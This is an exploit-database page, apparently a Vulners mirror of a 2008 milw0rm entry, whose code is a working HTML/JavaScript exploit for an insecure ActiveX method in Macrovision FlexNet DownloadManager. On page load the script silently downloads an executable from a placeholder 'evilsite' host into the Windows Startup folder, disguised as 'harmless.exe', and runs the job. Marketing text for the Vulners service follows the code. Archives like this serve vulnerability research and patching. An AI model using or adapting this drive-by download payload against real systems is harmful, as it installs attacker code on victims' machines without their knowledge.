Lucene search
K

Macrovision FlexNet DownloadManager - Insecure Methods

🗓️ 14 Jan 2008 00:00:00Reported by ElazarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Macrovision FlexNet DownloadManager Insecure Methods Exploit. Safe for Scripting. Tested on Windows XP SP2 English, IE6, ISDM.exe version 6.1.100.6137

Code
<!-- 
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
-->
<html>
 <head>
  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
	var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
	
	mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
	mJob.SetPriority(0);
	mJob.SetNotifyFlags(2);
	mJob.ScheduleInterval = 2;
	
	obj.RunScheduledJobs();
                
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation